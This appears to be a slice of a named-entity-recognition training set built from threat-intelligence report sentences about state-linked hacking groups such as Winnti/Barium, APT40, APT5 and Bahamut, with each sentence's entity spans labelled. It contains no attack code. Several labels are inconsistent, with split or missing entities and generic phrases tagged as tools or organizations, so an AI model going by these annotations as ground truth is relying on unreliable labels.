{"text": "this library includes two drivers compiled on August 22 and September 4 , 2014 .", "spans": {}, "info": {"id": "dnrti_train_001603", "source": "dnrti_train"}}
{"text": "Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[106, 132]], "ORGANIZATION: KSN": [[135, 138]], "ORGANIZATION: gaming companies": [[191, 207]]}, "info": {"id": "dnrti_train_001604", "source": "dnrti_train"}}
{"text": "Conversely , LokiBot and Agent Tesla are new malware tools .", "spans": {"TOOL: LokiBot": [[13, 20]], "TOOL: Agent Tesla": [[25, 36]]}, "info": {"id": "dnrti_train_001605", "source": "dnrti_train"}}
{"text": "Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples .", "spans": {"ORGANIZATION: Novetta": [[65, 72]], "TOOL: Winnti malware samples": [[109, 131]]}, "info": {"id": "dnrti_train_001606", "source": "dnrti_train"}}
{"text": "Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": {"ORGANIZATION: gaming organizations": [[49, 69]]}, "info": {"id": "dnrti_train_001607", "source": "dnrti_train"}}
{"text": "The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage .", "spans": {"ORGANIZATION: Novetta": [[12, 19], [115, 122]], "THREAT_ACTOR: Winnti": [[161, 167]]}, "info": {"id": "dnrti_train_001609", "source": "dnrti_train"}}
{"text": "We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing .", "spans": {}, "info": {"id": "dnrti_train_001610", "source": "dnrti_train"}}
{"text": "The Winnti umbrella continues to operate highly successfully in 2018 .", "spans": {}, "info": {"id": "dnrti_train_001611", "source": "dnrti_train"}}
{"text": "The Winnti umbrella and closely associated entities has been active since at least 2009 .", "spans": {}, "info": {"id": "dnrti_train_001612", "source": "dnrti_train"}}
{"text": "The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group .", "spans": {"THREAT_ACTOR: Winnti": [[4, 10]], "THREAT_ACTOR: group": [[21, 26]], "ORGANIZATION: Kaspersky Lab": [[49, 62]], "ORGANIZATION: Symantec": [[67, 75]]}, "info": {"id": "dnrti_train_001613", "source": "dnrti_train"}}
{"text": "Their operations against gaming and technology organizations are believed to be economically motivated in nature .", "spans": {"ORGANIZATION: gaming": [[25, 31]], "ORGANIZATION: technology organizations": [[36, 60]]}, "info": {"id": "dnrti_train_001614", "source": "dnrti_train"}}
{"text": "However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused .", "spans": {}, "info": {"id": "dnrti_train_001615", "source": "dnrti_train"}}
{"text": "The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses .", "spans": {"ORGANIZATION: gaming studios": [[59, 73]]}, "info": {"id": "dnrti_train_001616", "source": "dnrti_train"}}
{"text": "During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike .", "spans": {"TOOL: Cobalt Strike": [[147, 160]]}, "info": {"id": "dnrti_train_001617", "source": "dnrti_train"}}
{"text": "In this campaign , the attackers experimented with publicly available tooling for attack operations .", "spans": {"TOOL: publicly available tooling": [[51, 77]]}, "info": {"id": "dnrti_train_001618", "source": "dnrti_train"}}
{"text": "The primary goal of these attacks was likely to find code-signing certificates for signing future malware .", "spans": {}, "info": {"id": "dnrti_train_001619", "source": "dnrti_train"}}
{"text": "The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , BARIUM , Wicked Panda , and GREF .", "spans": {}, "info": {"id": "dnrti_train_001620", "source": "dnrti_train"}}
{"text": "The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 .", "spans": {}, "info": {"id": "dnrti_train_001621", "source": "dnrti_train"}}
{"text": "ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) .", "spans": {"ORGANIZATION: Department of Homeland Security": [[72, 103]], "ORGANIZATION: DHS": [[106, 109]]}, "info": {"id": "dnrti_train_001622", "source": "dnrti_train"}}
{"text": "ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security .", "spans": {"ORGANIZATION: Department of Homeland Security": [[72, 103]]}, "info": {"id": "dnrti_train_001623", "source": "dnrti_train"}}
{"text": "ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems .", "spans": {"TOOL: compromised websites": [[43, 63]]}, "info": {"id": "dnrti_train_001624", "source": "dnrti_train"}}
{"text": "In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) .", "spans": {"ORGANIZATION: DHS": [[20, 23]], "ORGANIZATION: Symantec": [[110, 118]], "ORGANIZATION: Dragos": [[143, 149]]}, "info": {"id": "dnrti_train_001625", "source": "dnrti_train"}}
{"text": "In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group .", "spans": {"ORGANIZATION: DHS": [[20, 23]]}, "info": {"id": "dnrti_train_001626", "source": "dnrti_train"}}
{"text": "We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus .", "spans": {}, "info": {"id": "dnrti_train_001627", "source": "dnrti_train"}}
{"text": "ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities .", "spans": {}, "info": {"id": "dnrti_train_001628", "source": "dnrti_train"}}
{"text": "In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly .", "spans": {"ORGANIZATION: DHS": [[20, 23]], "ORGANIZATION: Symantec": [[110, 118]]}, "info": {"id": "dnrti_train_001629", "source": "dnrti_train"}}
{"text": "Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests .", "spans": {"ORGANIZATION: DHS": [[51, 54]]}, "info": {"id": "dnrti_train_001630", "source": "dnrti_train"}}
{"text": "ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system .", "spans": {}, "info": {"id": "dnrti_train_001631", "source": "dnrti_train"}}
{"text": "However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"ORGANIZATION: Dragos WorldView": [[142, 158]]}, "info": {"id": "dnrti_train_001633", "source": "dnrti_train"}}
{"text": "In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors .", "spans": {"ORGANIZATION: aerospace companies": [[222, 241]], "ORGANIZATION: defense contractors": [[248, 267]]}, "info": {"id": "dnrti_train_001634", "source": "dnrti_train"}}
{"text": "A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology .", "spans": {"ORGANIZATION: maritime sector": [[78, 93]]}, "info": {"id": "dnrti_train_001635", "source": "dnrti_train"}}
{"text": "PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy .", "spans": {"THREAT_ACTOR: Anchor Panda": [[9, 21]], "ORGANIZATION: CrowdStrike": [[43, 54]]}, "info": {"id": "dnrti_train_001636", "source": "dnrti_train"}}
{"text": "ALLANITE operations continue and intelligence indicates activity since at least May 2017 .", "spans": {}, "info": {"id": "dnrti_train_001637", "source": "dnrti_train"}}
{"text": "APT Anchor Panda is a Chinese threat actor group who target maritime operations .", "spans": {}, "info": {"id": "dnrti_train_001638", "source": "dnrti_train"}}
{"text": "According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active .", "spans": {}, "info": {"id": "dnrti_train_001639", "source": "dnrti_train"}}
{"text": "In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing .", "spans": {"TOOL: Adobe Gh0st": [[22, 33]], "TOOL: Poison Ivy": [[36, 46]], "TOOL: Torn RAT malware": [[51, 67]]}, "info": {"id": "dnrti_train_001641", "source": "dnrti_train"}}
{"text": "Their targets are marine companies that operate in and around the South China Sea , an area of much Chinese interest .", "spans": {"ORGANIZATION: marine companies": [[18, 34]]}, "info": {"id": "dnrti_train_001642", "source": "dnrti_train"}}
{"text": "As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities .", "spans": {}, "info": {"id": "dnrti_train_001643", "source": "dnrti_train"}}
{"text": "The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope .", "spans": {"THREAT_ACTOR: Advanced Persistent": [[52, 71]], "THREAT_ACTOR: Threat ( APT ) 40": [[72, 89]], "THREAT_ACTOR: Periscope": [[104, 113]]}, "info": {"id": "dnrti_train_001644", "source": "dnrti_train"}}
{"text": "The group has been active since at least January 2013 .", "spans": {}, "info": {"id": "dnrti_train_001645", "source": "dnrti_train"}}
{"text": "The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states .", "spans": {}, "info": {"id": "dnrti_train_001646", "source": "dnrti_train"}}
{"text": "The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world .", "spans": {}, "info": {"id": "dnrti_train_001647", "source": "dnrti_train"}}
{"text": "The times of day the group is active also suggests that it is based near Beijing and the group has reportedly used malware that has been observed in other Chinese operations , indicating some level of collaboration .", "spans": {}, "info": {"id": "dnrti_train_001648", "source": "dnrti_train"}}
{"text": "Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state .", "spans": {}, "info": {"id": "dnrti_train_001649", "source": "dnrti_train"}}
{"text": "APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "TOOL: publicly available tools": [[159, 183]]}, "info": {"id": "dnrti_train_001650", "source": "dnrti_train"}}
{"text": "Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": {"TOOL: CVE software vulnerabilities": [[182, 210]]}, "info": {"id": "dnrti_train_001651", "source": "dnrti_train"}}
{"text": "Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network .", "spans": {"THREAT_ACTOR: APT40": [[40, 45]], "TOOL: Gh0st RAT trojan": [[156, 172]]}, "info": {"id": "dnrti_train_001652", "source": "dnrti_train"}}
{"text": "The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": {"TOOL: CVE software vulnerabilities": [[179, 207]]}, "info": {"id": "dnrti_train_001653", "source": "dnrti_train"}}
{"text": "More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors .", "spans": {}, "info": {"id": "dnrti_train_001654", "source": "dnrti_train"}}
{"text": "APT5 has been active since at least 2007 .", "spans": {"THREAT_ACTOR: APT5": [[0, 4]]}, "info": {"id": "dnrti_train_001655", "source": "dnrti_train"}}
{"text": "APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications .", "spans": {"THREAT_ACTOR: APT5": [[0, 4]], "ORGANIZATION: technology companies": [[127, 147]]}, "info": {"id": "dnrti_train_001656", "source": "dnrti_train"}}
{"text": "APT5 targeted the network of an electronics firm that sells products for both industrial and military applications .", "spans": {"THREAT_ACTOR: APT5": [[0, 4]], "ORGANIZATION: electronics firm": [[32, 48]]}, "info": {"id": "dnrti_train_001657", "source": "dnrti_train"}}
{"text": "The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided .", "spans": {}, "info": {"id": "dnrti_train_001658", "source": "dnrti_train"}}
{"text": "In one case in late 2014 , APT5 breached the network of an international telecommunications company .", "spans": {"ORGANIZATION: international telecommunications company": [[59, 99]]}, "info": {"id": "dnrti_train_001659", "source": "dnrti_train"}}
{"text": "The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies .", "spans": {"ORGANIZATION: telecommunications companies": [[144, 172]]}, "info": {"id": "dnrti_train_001660", "source": "dnrti_train"}}
{"text": "APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware .", "spans": {"ORGANIZATION: telecommunications providers": [[67, 95]], "TOOL: Leouncia malware": [[101, 117]]}, "info": {"id": "dnrti_train_001661", "source": "dnrti_train"}}
{"text": "We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems .", "spans": {}, "info": {"id": "dnrti_train_001662", "source": "dnrti_train"}}
{"text": "The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems .", "spans": {"ORGANIZATION: FBI": [[4, 7]], "THREAT_ACTOR: group of malicious cyber actors": [[19, 50]], "THREAT_ACTOR: APT6": [[64, 68]], "THREAT_ACTOR: 1.php": [[72, 77]], "TOOL: customized malicious software": [[178, 207]]}, "info": {"id": "dnrti_train_001663", "source": "dnrti_train"}}
{"text": "Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"ORGANIZATION: Deepen": [[0, 6]], "ORGANIZATION: China and US relations experts": [[95, 125]], "ORGANIZATION: Defense Department": [[128, 146]], "ORGANIZATION: geospatial groups": [[162, 179]]}, "info": {"id": "dnrti_train_001664", "source": "dnrti_train"}}
{"text": "Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"ORGANIZATION: Government officials": [[0, 20]]}, "info": {"id": "dnrti_train_001665", "source": "dnrti_train"}}
{"text": "According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": {"ORGANIZATION: Deepen": [[13, 19]], "THREAT_ACTOR: APT6": [[22, 26]], "TOOL: PDF": [[82, 85]], "TOOL: ZIP": [[90, 93]], "MALWARE: SCR file": [[170, 178]]}, "info": {"id": "dnrti_train_001666", "source": "dnrti_train"}}
{"text": "Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack .", "spans": {}, "info": {"id": "dnrti_train_001667", "source": "dnrti_train"}}
{"text": "The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware .", "spans": {"TOOL: Poison Ivy malware": [[158, 176]]}, "info": {"id": "dnrti_train_001668", "source": "dnrti_train"}}
{"text": "Over the summer they compromised several sites , including a well-known Uyghur website written in that native language .", "spans": {}, "info": {"id": "dnrti_train_001669", "source": "dnrti_train"}}
{"text": "In contrast to many other APT campaigns , which tend to rely heavily on spear phishing to gain victims , \" th3bug \" is known for compromising legitimate websites their intended visitors are likely to frequent .", "spans": {}, "info": {"id": "dnrti_train_001670", "source": "dnrti_train"}}
{"text": "While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": {"VULNERABILITY: CVE-2014-0515": [[89, 102]], "VULNERABILITY: Adobe Flash exploit": [[103, 122]], "ORGANIZATION: Cisco TRAC": [[141, 151]]}, "info": {"id": "dnrti_train_001671", "source": "dnrti_train"}}
{"text": "However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": {"THREAT_ACTOR: APT20": [[36, 41]], "VULNERABILITY: zero-day exploits": [[50, 67]]}, "info": {"id": "dnrti_train_001672", "source": "dnrti_train"}}
{"text": "Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers .", "spans": {"ORGANIZATION: platform providers": [[204, 222]]}, "info": {"id": "dnrti_train_001673", "source": "dnrti_train"}}
{"text": "Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"ORGANIZATION: Middle Eastern human rights activist": [[45, 81]]}, "info": {"id": "dnrti_train_001674", "source": "dnrti_train"}}
{"text": "Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"ORGANIZATION: Iranian women 's activist": [[82, 107]], "ORGANIZATION: individual": [[113, 123]]}, "info": {"id": "dnrti_train_001675", "source": "dnrti_train"}}
{"text": "In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": {"THREAT_ACTOR: Bahamut": [[62, 69]]}, "info": {"id": "dnrti_train_001676", "source": "dnrti_train"}}
{"text": "Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data .", "spans": {"THREAT_ACTOR: APT40": [[24, 29]], "TOOL: credential-harvesting tools": [[35, 62]]}, "info": {"id": "dnrti_train_001677", "source": "dnrti_train"}}
{"text": "Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably .", "spans": {"THREAT_ACTOR: Bahamut": [[0, 7]], "TOOL: Android malware": [[69, 84]]}, "info": {"id": "dnrti_train_001678", "source": "dnrti_train"}}
{"text": "Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": {"THREAT_ACTOR: APT5": [[16, 20]], "ORGANIZATION: organizations": [[34, 47]], "ORGANIZATION: personnel": [[52, 61]]}, "info": {"id": "dnrti_train_001680", "source": "dnrti_train"}}
{"text": "However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before .", "spans": {}, "info": {"id": "dnrti_train_001681", "source": "dnrti_train"}}
{"text": "Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation .", "spans": {}, "info": {"id": "dnrti_train_001682", "source": "dnrti_train"}}
{"text": "As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition .", "spans": {}, "info": {"id": "dnrti_train_001683", "source": "dnrti_train"}}
{"text": "In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent .", "spans": {"TOOL: domains": [[41, 48]], "TOOL: custom Android malware agent": [[97, 125]]}, "info": {"id": "dnrti_train_001684", "source": "dnrti_train"}}
{"text": "After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) .", "spans": {"TOOL: Khuai": [[164, 169]]}, "info": {"id": "dnrti_train_001685", "source": "dnrti_train"}}
{"text": "FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region .", "spans": {}, "info": {"id": "dnrti_train_001686", "source": "dnrti_train"}}
{"text": "As a result , it is already flagged as Bahamut by antivirus engines .", "spans": {}, "info": {"id": "dnrti_train_001687", "source": "dnrti_train"}}
{"text": "Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers .", "spans": {"ORGANIZATION: platform providers": [[159, 177]]}, "info": {"id": "dnrti_train_001688", "source": "dnrti_train"}}
{"text": "One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software .", "spans": {"TOOL: legitimate software": [[184, 203]]}, "info": {"id": "dnrti_train_001689", "source": "dnrti_train"}}
{"text": "Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords .", "spans": {}, "info": {"id": "dnrti_train_001690", "source": "dnrti_train"}}
{"text": "Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" flash text \" .", "spans": {"ORGANIZATION: Google": [[98, 104]]}, "info": {"id": "dnrti_train_001691", "source": "dnrti_train"}}
{"text": "These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address .", "spans": {}, "info": {"id": "dnrti_train_001692", "source": "dnrti_train"}}
{"text": "We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations .", "spans": {"THREAT_ACTOR: Bahamut": [[30, 37]]}, "info": {"id": "dnrti_train_001693", "source": "dnrti_train"}}
{"text": "Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud .", "spans": {"THREAT_ACTOR: Bahamut": [[11, 18]]}, "info": {"id": "dnrti_train_001694", "source": "dnrti_train"}}
{"text": "The targets and themes of Bahamut 's campaigns have consistently fallen within two regions – South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) .", "spans": {}, "info": {"id": "dnrti_train_001695", "source": "dnrti_train"}}
{"text": "Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted .", "spans": {"TOOL: Android malware": [[173, 188]]}, "info": {"id": "dnrti_train_001696", "source": "dnrti_train"}}
{"text": "Bahamut targeted similar Qatar-based individuals during their campaign .", "spans": {"THREAT_ACTOR: Bahamut": [[0, 7]]}, "info": {"id": "dnrti_train_001697", "source": "dnrti_train"}}
{"text": "Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc .", "spans": {"ORGANIZATION: Bellingcat": [[0, 10]], "MALWARE: decoy documents": [[79, 94]], "MALWARE: hxxp://voguextra.com/decoy.doc": [[132, 162]]}, "info": {"id": "dnrti_train_001698", "source": "dnrti_train"}}
{"text": "The China-backed BARIUM APT is suspected to be at the helm of the project .", "spans": {}, "info": {"id": "dnrti_train_001699", "source": "dnrti_train"}}
{"text": "Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers – which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab .", "spans": {"ORGANIZATION: Kaspersky Lab": [[245, 258]]}, "info": {"id": "dnrti_train_001700", "source": "dnrti_train"}}
{"text": "Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13], [42, 55]]}, "info": {"id": "dnrti_train_001701", "source": "dnrti_train"}}
{"text": "To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": {"ORGANIZATION: Kaspersky Lab": [[28, 41]]}, "info": {"id": "dnrti_train_001702", "source": "dnrti_train"}}
{"text": "BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines .", "spans": {"THREAT_ACTOR: BARIUM": [[0, 6]], "THREAT_ACTOR: APT17": [[50, 55]], "THREAT_ACTOR: Axiom": [[58, 63]], "THREAT_ACTOR: Deputy": [[68, 74]], "THREAT_ACTOR: Dog": [[75, 78]], "TOOL: ShadowPad": [[110, 119]], "TOOL: CCleaner": [[124, 132]], "TOOL: software updates": [[192, 208]]}, "info": {"id": "dnrti_train_001703", "source": "dnrti_train"}}
{"text": "That said , the \" fingerprints \" left on the samples by the attackers – including techniques used to achieve unauthorized code execution – suggest that the BARIUM APT is behind the effort , according to the researchers .", "spans": {"THREAT_ACTOR: BARIUM APT": [[156, 166]]}, "info": {"id": "dnrti_train_001704", "source": "dnrti_train"}}
{"text": "In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor .", "spans": {"ORGANIZATION: server management software provider": [[63, 98]]}, "info": {"id": "dnrti_train_001705", "source": "dnrti_train"}}
{"text": "In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor .", "spans": {"TOOL: software updates": [[38, 54]], "TOOL: ShadowPad backdoor": [[179, 197]]}, "info": {"id": "dnrti_train_001706", "source": "dnrti_train"}}
{"text": "NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong .", "spans": {}, "info": {"id": "dnrti_train_001707", "source": "dnrti_train"}}
{"text": "Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": {"ORGANIZATION: labor rights advocates": [[84, 106]], "ORGANIZATION: foreign policy institutions": [[128, 155]]}, "info": {"id": "dnrti_train_001708", "source": "dnrti_train"}}
{"text": "Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"ORGANIZATION: employees": [[129, 138], [271, 280]]}, "info": {"id": "dnrti_train_001709", "source": "dnrti_train"}}
{"text": "We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"THREAT_ACTOR: Bahamut": [[73, 80]], "MALWARE: Devoted To Humanity": [[96, 115]]}, "info": {"id": "dnrti_train_001710", "source": "dnrti_train"}}
{"text": "Althoughthe BariumDefendants have relied on differentand distinct infrastructures in an effortto evade detection , Bariumused the same e-mail address (hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers .", "spans": {"THREAT_ACTOR: Barium": [[253, 259]]}, "info": {"id": "dnrti_train_001711", "source": "dnrti_train"}}
{"text": "The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update .", "spans": {"TOOL: ShadowPad": [[67, 76]], "THREAT_ACTOR: Barium": [[99, 105]], "ORGANIZATION: third-party software provider": [[140, 169]]}, "info": {"id": "dnrti_train_001712", "source": "dnrti_train"}}
{"text": "To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites .", "spans": {"THREAT_ACTOR: Barium": [[73, 79]]}, "info": {"id": "dnrti_train_001713", "source": "dnrti_train"}}
{"text": "Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within HumanResources or Business Developmentdepartments ofthe targeted organizations in order to compromise the computers ofsuch individuals .", "spans": {"THREAT_ACTOR: Barium": [[52, 58]]}, "info": {"id": "dnrti_train_001714", "source": "dnrti_train"}}
{"text": "The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques .", "spans": {"TOOL: Barlaiy": [[66, 73]], "TOOL: PlugXL": [[82, 88]]}, "info": {"id": "dnrti_train_001715", "source": "dnrti_train"}}
{"text": "Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as ifit were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim .", "spans": {"THREAT_ACTOR: Barium": [[79, 85]]}, "info": {"id": "dnrti_train_001716", "source": "dnrti_train"}}
{"text": "Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above .", "spans": {"THREAT_ACTOR: Barium": [[0, 6]], "TOOL: Win32/Barlaiy": [[42, 55]], "TOOL: Win32/PlugX.L": [[86, 99]]}, "info": {"id": "dnrti_train_001717", "source": "dnrti_train"}}
{"text": "Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device .", "spans": {"TOOL: Win32/Barlaiy": [[5, 18]], "TOOL: Win32/PlugX.L": [[21, 34]], "THREAT_ACTOR: Barium": [[79, 85]]}, "info": {"id": "dnrti_train_001718", "source": "dnrti_train"}}
{"text": "Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" .", "spans": {"THREAT_ACTOR: Barium": [[0, 6]], "TOOL: Win32/RibDoor.A!dha": [[90, 109]]}, "info": {"id": "dnrti_train_001719", "source": "dnrti_train"}}
{"text": "While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": {"ORGANIZATION: Microsoft": [[33, 42]], "THREAT_ACTOR: Barium": [[94, 100]], "MALWARE: Win32/ShadowPad.A": [[139, 156]]}, "info": {"id": "dnrti_train_001720", "source": "dnrti_train"}}
{"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": {"MALWARE: MXI Player": [[0, 10]]}, "info": {"id": "dnrti_train_001721", "source": "dnrti_train"}}
{"text": "Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States .", "spans": {}, "info": {"id": "dnrti_train_001722", "source": "dnrti_train"}}
{"text": "Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": {"THREAT_ACTOR: Barium": [[0, 6]], "ORGANIZATION: Microsoft customers": [[20, 39]]}, "info": {"id": "dnrti_train_001723", "source": "dnrti_train"}}
{"text": "Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network .", "spans": {}, "info": {"id": "dnrti_train_001724", "source": "dnrti_train"}}
